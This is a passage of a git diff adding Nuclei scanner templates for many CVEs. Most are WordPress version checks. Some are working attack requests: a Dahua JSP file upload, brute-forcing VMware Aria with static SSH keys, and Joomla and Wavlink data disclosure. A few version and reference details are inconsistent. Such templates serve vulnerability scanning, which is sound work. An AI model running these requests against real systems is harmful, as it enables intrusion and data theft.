type: status status: - 200 +# digest: 4a0a004730450221009bdc77f77eb66f778dee6a75e98c88a6bcd5e808092e54fda860131ddb410dfa02203dd0c252c21a4aa4cb205a96dd5488ddb1fccc30d33ba60d892a8c2e61f3b4f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-34049.yaml b/poc/cve/CVE-2022-34049.yaml index 6a78378e04..18d404e7f4 100644 --- a/poc/cve/CVE-2022-34049.yaml +++ b/poc/cve/CVE-2022-34049.yaml @@ -1,29 +1,41 @@ id: CVE-2022-34049 + info: - name: Wavlink Exportlogs.sh - Configuration Exposure + name: WAVLINK WN530HG4 - Improper Access Control author: For3stCo1d severity: medium description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows unauthenticated attackers to download log files and configuration data. + Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34049 - https://drive.google.com/file/d/1ZeSwqu04OghLQXeG7emU-w-Amgadafqx/view?usp=sharing - https://drive.google.com/file/d/1-eNgq6IS609bq2vB93c_N8jnZrJ2dgNF/view?usp=sharing + - https://nvd.nist.gov/vuln/detail/CVE-2022-34049 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-34049 cwe-id: CWE-552 + epss-score: 0.14992 + epss-percentile: 0.95267 + cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn530hg4_firmware shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" tags: cve,cve2022,wavlink,router,exposure -requests: + +http: - raw: - | GET /cgi-bin/ExportLogs.sh HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -32,10 +44,13 @@ requests: - 'Login' - 'Password' condition: and + - type: word part: header words: - filename="sysLogs.txt" + - type: status status: - 200 +# digest: 4b0a00483046022100c105baf81eece25876bb160c12d4020488d8704a9471c6741843cdf519aeb7cf022100ea687a1bbdac5c1f579a5a45a454b6fb66e7032e80bbffd0b05f0fa19b0b165c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2022-35416.yaml b/poc/cve/CVE-2022-35416.yaml index d7f5f121af..d782414f0d 100644 --- a/poc/cve/CVE-2022-35416.yaml +++ b/poc/cve/CVE-2022-35416.yaml @@ -1,13 +1,10 @@ id: CVE-2022-35416 - info: - name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting + name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS author: 0x240x23elu severity: medium description: | - H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. - remediation: | - Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. + H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. reference: - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - https://github.com/Docker-droid/H3C_SSL_VPN_XSS @@ -17,37 +14,26 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35416 cwe-id: CWE-79 - epss-score: 0.00099 - epss-percentile: 0.4077 - cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: h3c - product: ssl_vpn shodan-query: http.html_hash:510586239 + verified: "true" tags: cve,cve2022,xss,vpn,h3c - -http: +requests: - raw: - | GET /wnm/login/login.json HTTP/1.1 Host: {{Hostname}} Cookie: svpnlang= - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100a4f986c5d3f3b0e3b30e1a33032cdc39383aabd9d733304df6780d16624318d2022100bb462e408b23eb355059a372a2f16313b88aa396c31a5e3fb8aa45e6f7d68196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-23752.yaml b/poc/cve/CVE-2023-23752.yaml index 7d7b738f04..20f529a757 100644 --- a/poc/cve/CVE-2023-23752.yaml +++ b/poc/cve/CVE-2023-23752.yaml @@ -1,35 +1,57 @@ id: CVE-2023-23752 info: - name: Joomla Webservice Endpoint access control - author: thecyberneh - description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. - severity: high - tags: cves + name: Joomla! Webservice - Password Disclosure + author: badboycxcc,Sascha Brendel + severity: medium + description: | + An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + remediation: Upgrade to Joomla! version 4.2.8 or later. + reference: + - https://unsafe.sh/go-149780.html + - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + epss-score: 0.75089 + epss-percentile: 0.97845 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: joomla + product: joomla\! + shodan-query: html:"Joomla! - Open Source Content Management" + tags: cve,cve2023,joomla -requests: +http: - method: GET path: - - "{{BaseURL}}/api/index.php/v1/config/application?public=true" + - '{{BaseURL}}/api/index.php/v1/config/application?public=true' + - '{{BaseURL}}/api/v1/config/application?public=true' + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - "password" + - '"links":' + - '"attributes":' + condition: and - type: word - part: body - words: - - "application" - - - type: word - part: body + part: header words: - - "attributes" + - 'application/json' + - 'application/vnd.api+json' + condition: or - type: status status: - 200 +# digest: 4a0a004730450221008f759f564d7a456a2b10a0654305e2feacd40022c767644dc6dd29656cfd6b9f0220632bcf84c3981822a12d002f9dfa81a728ea2a70e37ea053434a8666554fd72f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-34039.yaml b/poc/cve/CVE-2023-34039.yaml new file mode 100644 index 0000000000..c83d8c7995 --- /dev/null +++ b/poc/cve/CVE-2023-34039.yaml @@ -0,0 +1,67 @@ +id: CVE-2023-34039 + +info: + name: VMWare Aria Operations - Remote Code Execution + author: tarunKoyalwar + severity: critical + description: | + VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039) + Version: All versions from 6.0 to 6.10 + impact: | + Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix this vulnerability. + reference: + - https://github.com/sinsinology/CVE-2023-34039.git + - https://nvd.nist.gov/vuln/detail/CVE-2023-34039 + - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html + - https://www.vmware.com/security/advisories/VMSA-2023-0018.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34039 + cwe-id: CWE-327 + epss-score: 0.9013 + epss-percentile: 0.98721 + cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: vmware + product: aria_operations_for_networks + tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize +variables: + keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory + +javascript: + # init field can be used to make any preperations before the actual exploit + # here we are reading all private keys from helpers folder and storing them in a list + - init: | + let m = require('nuclei/fs'); + let privatekeys = m.ReadFilesFromDir(keysDir) + updatePayload('keys',privatekeys) + # check if port is open before bruteforcing + pre-condition: | + isPortOpen(Host,Port) + # actual exploit + code: | + let m = require('nuclei/ssh') + let c = m.SSHClient() + c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful + args: + Host: "{{Host}}" + Port: "22" + key: "{{keys}}" + keysDir: "{{keysDir}}" + payloads: + # 'keys' will be updated by actual private keys after init is executed + keys: + - dummy1 + - dummy2 + threads: 10 + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - success && response +# digest: 4a0a0047304502202b98e75ed8b7179fce923039e93baf0da9359ae4bd9edd5f205768ed70bbdd2d022100fdd378ca41e7a2cb85cf3c74f02fc2418502e6aac28860f13d8a20aaa60ce903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2023-35047.yaml b/poc/cve/CVE-2023-35047.yaml index bee45f7498..a8e1f1a930 100644 --- a/poc/cve/CVE-2023-35047.yaml +++ b/poc/cve/CVE-2023-35047.yaml @@ -53,4 +53,4 @@ http: - type: dsl dsl: - - compare_versions(version, '<= 1.3.6') \ No newline at end of file + - compare_versions(version, '<= 1.3.6') diff --git a/poc/cve/CVE-2023-3836.yaml b/poc/cve/CVE-2023-3836.yaml index c7afb0444b..d9ab862ef2 100644 --- a/poc/cve/CVE-2023-3836.yaml +++ b/poc/cve/CVE-2023-3836.yaml @@ -1,50 +1,68 @@ id: CVE-2023-3836 info: - name: 大华-WPMS-upload-addimgico - author: hufei - severity: high + name: Dahua Smart Park Management - Arbitrary File Upload + author: HuTa0 + severity: critical description: | - 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限 + Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E + - https://github.com/qiuhuihk/cve/blob/main/upload.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 + - https://vuldb.com/?ctiid.235162 + - https://vuldb.com/?id.235162 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-3836 + cwe-id: CWE-434 + epss-score: 0.03083 + epss-percentile: 0.89967 + cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: - max-request: 1 - fofa-query: app="大华-智慧园区综合管理平台" - hunter-query: app.name="Dahua 大华 智慧园区管理平台" verified: true + max-request: 2 + vendor: dahuasecurity + product: smart_parking_management + shodan-query: html:"/WPMS/asset" + zoomeye-query: /WPMS/asset + tags: cve,cve2023,dahua,fileupload,intrusive,rce +variables: + random_str: "{{rand_base(6)}}" + match_str: "{{md5(random_str)}}" http: - raw: - | POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 + Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT Host: {{Hostname}} - User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 177 - Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29 - --e00b34d08d13639f8b619829b04c1a29 - Content-Disposition: form-data; name="upload"; filename="test.jsp" - Content-Type: image/gif - - {{randstr}} - --e00b34d08d13639f8b619829b04c1a29-- + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT + Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" + Content-Type: application/octet-stream + Content-Transfer-Encoding: binary + {{match_str}} + --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - | - GET /upload/emap/society_new/{{name}} HTTP/1.1 + GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && status_code_2 == 200" + - "contains(body_2, '{{match_str}}')" + condition: and + extractors: - - type: json - name: name - json: - - ".data" + - type: regex + name: shell_filename internal: true - - matchers: - - type: word - words: - - '{{randstr}}' \ No newline at end of file + part: body_1 + regex: + - 'ico_res_(\w+)_on\.jsp' +# digest: 4b0a00483046022100f2fe66aae8a7930c251558f40e6a8761a1a2f08dc61ceb26fdb620340e407485022100b09958027468fc3a2c2e0713cd534f24ffcb47ccdbdc4fe72a231113cc9f634f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-1183.yaml b/poc/cve/CVE-2024-1183.yaml new file mode 100644 index 0000000000..06f1156ff3 --- /dev/null +++ b/poc/cve/CVE-2024-1183.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1183 + +info: + name: Gradio - Server Side Request Forgery + author: DhiyaneshDK + severity: medium + description: | + An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response. + reference: + - https://github.com/gradio-app/gradio/commit/2ad3d9e7ec6c8eeea59774265b44f11df7394bb4 + - https://huntr.com/bounties/103434f9-87d2-42ea-9907-194a3c25007c + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-1183 + cwe-id: CWE-601 + epss-score: 0.00061 + epss-percentile: 0.24702 + metadata: + verified: true + max-request: 1 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,ssrf,oast,gradio + +http: + - raw: + - | + GET /file=http://oast.pro HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + part: header +# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-32651.yaml b/poc/cve/CVE-2024-32651.yaml new file mode 100644 index 0000000000..1a2deb2d94 --- /dev/null +++ b/poc/cve/CVE-2024-32651.yaml @@ -0,0 +1,57 @@ +id: CVE-2024-32651 + +info: + name: Change Detection - Server Side Template Injection + author: edoardottt + severity: critical + description: | + A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32651 + - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3 + - https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21 + - https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-32651 + cwe-id: CWE-1336 + epss-score: 0.00045 + epss-percentile: 0.14322 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Change Detection" + tags: cve,cve2024,changedetection,ssti,rce,passive + +http: + - method: GET + path: + - "{{RootURL}}/" + + redirects: true + max-redirects: 2 + + extractors: + - type: xpath + name: version + internal: true + xpath: + - "//*[@id=\"right-sticky\"]" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Change Detection" + condition: and + + - type: dsl + dsl: + - compare_versions(version, '<= 0.45.20') +# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2024-35668.yaml b/poc/cve/CVE-2024-35668.yaml new file mode 100644 index 0000000000..ee7ac8de51 --- /dev/null +++ b/poc/cve/CVE-2024-35668.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-35668 + +info: + name: > + Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue <= 3.1.77 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.1.77 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80c90bc0-ca24-4c7f-93b9-a9d0804ee459?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-35668 + metadata: + fofa-query: "wp-content/plugins/mailin/" + google-query: inurl:"/wp-content/plugins/mailin/" + shodan-query: 'vuln:CVE-2024-35668' + tags: cve,wordpress,wp-plugin,mailin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mailin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mailin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.77') \ No newline at end of file diff --git a/poc/cve/CVE-2024-3668.yaml b/poc/cve/CVE-2024-3668.yaml new file mode 100644 index 0000000000..62ee003cba --- /dev/null +++ b/poc/cve/CVE-2024-3668.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-3668 + +info: + name: > + PowerPack Pro for Elementor <= 2.10.17 - Authenticated (Contributor+) Privilege Escalation + author: topscoder + severity: low + description: > + The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/249ccc77-0daf-41bc-b5c5-991bf17d645d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-3668 + metadata: + fofa-query: "wp-content/plugins/powerpack-elements/" + google-query: inurl:"/wp-content/plugins/powerpack-elements/" + shodan-query: 'vuln:CVE-2024-3668' + tags: cve,wordpress,wp-plugin,powerpack-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/powerpack-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "powerpack-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.10.17') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4468.yaml b/poc/cve/CVE-2024-4468.yaml new file mode 100644 index 0000000000..cc7669e382 --- /dev/null +++ b/poc/cve/CVE-2024-4468.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-4468 + +info: + name: > + Salon booking system <= 9.9 - Missing Authorization + author: topscoder + severity: low + description: > + The Salon booking system plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on several functions hooked into admin_init in all versions up to, and including, 9.9. This makes it possible for authenticated attackers with subscriber access or higher to modify plugin settings and view discount codes intended for other users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b73f864-68b5-4ba8-93a3-37f2564cc240?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-4468 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-4468' + tags: cve,wordpress,wp-plugin,salon-booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-4661.yaml b/poc/cve/CVE-2024-4661.yaml new file mode 100644 index 0000000000..2560456a2a --- /dev/null +++ b/poc/cve/CVE-2024-4661.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-4661 + +info: + name: > + WP Reset <= 2.02 - Missing Authorization to License Key Modification + author: topscoder + severity: low + description: > + The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value fo the 'License Key' field for the 'Activate Pro License' setting. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-4661 + metadata: + fofa-query: "wp-content/plugins/wp-reset/" + google-query: inurl:"/wp-content/plugins/wp-reset/" + shodan-query: 'vuln:CVE-2024-4661' + tags: cve,wordpress,wp-plugin,wp-reset,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-reset" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.01') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5087.yaml b/poc/cve/CVE-2024-5087.yaml new file mode 100644 index 0000000000..c7cb9e4238 --- /dev/null +++ b/poc/cve/CVE-2024-5087.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5087 + +info: + name: > + Minimal Coming Soon – Coming Soon Page <= 2.38 - Missing Authorization to Limited Settings Change + author: topscoder + severity: low + description: > + The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the validate_ajax, deactivate_ajax, and save_ajax functions in all versions up to, and including, 2.38. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the license key, which could disable features of the plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/affdaf63-2098-4ad6-b15b-990d1941fecb?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-5087 + metadata: + fofa-query: "wp-content/plugins/minimal-coming-soon-maintenance-mode/" + google-query: inurl:"/wp-content/plugins/minimal-coming-soon-maintenance-mode/" + shodan-query: 'vuln:CVE-2024-5087' + tags: cve,wordpress,wp-plugin,minimal-coming-soon-maintenance-mode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/minimal-coming-soon-maintenance-mode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "minimal-coming-soon-maintenance-mode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.38') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5091.yaml b/poc/cve/CVE-2024-5091.yaml new file mode 100644 index 0000000000..637c9061bd --- /dev/null +++ b/poc/cve/CVE-2024-5091.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5091 + +info: + name: > + SKT Addons for Elementor <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Age Gate and Creative Slider Widgets + author: topscoder + severity: low + description: > + The SKT Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Age Gate and Creative Slider widgets in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8d63ee-4929-4940-bc6a-931524e20272?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L + cvss-score: 7.4 + cve-id: CVE-2024-5091 + metadata: + fofa-query: "wp-content/plugins/skt-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/skt-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-5091' + tags: cve,wordpress,wp-plugin,skt-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5613.yaml b/poc/cve/CVE-2024-5613.yaml new file mode 100644 index 0000000000..56b00e43ae --- /dev/null +++ b/poc/cve/CVE-2024-5613.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5613 + +info: + name: > + Formula <= 0.5.1 - Reflected Cross-Site Scripting via quality_customizer_notify_dismiss_action + author: topscoder + severity: medium + description: > + The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'quality_customizer_notify_dismiss_action' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bf391432-d569-4458-947f-fe4a2ebcf8f1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-5613 + metadata: + fofa-query: "wp-content/themes/formula/" + google-query: inurl:"/wp-content/themes/formula/" + shodan-query: 'vuln:CVE-2024-5613' + tags: cve,wordpress,wp-theme,formula,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/formula/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "formula" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5638.yaml b/poc/cve/CVE-2024-5638.yaml new file mode 100644 index 0000000000..7747dee395 --- /dev/null +++ b/poc/cve/CVE-2024-5638.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5638 + +info: + name: > + Formula <= 0.5.1 - Reflected Cross-Site Scripting via ti_customizer_notify_dismiss_recommended_plugins + author: topscoder + severity: medium + description: > + The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'ti_customizer_notify_dismiss_recommended_plugins' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/193eeb92-f0af-4c6a-ac44-3166023a3006?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + 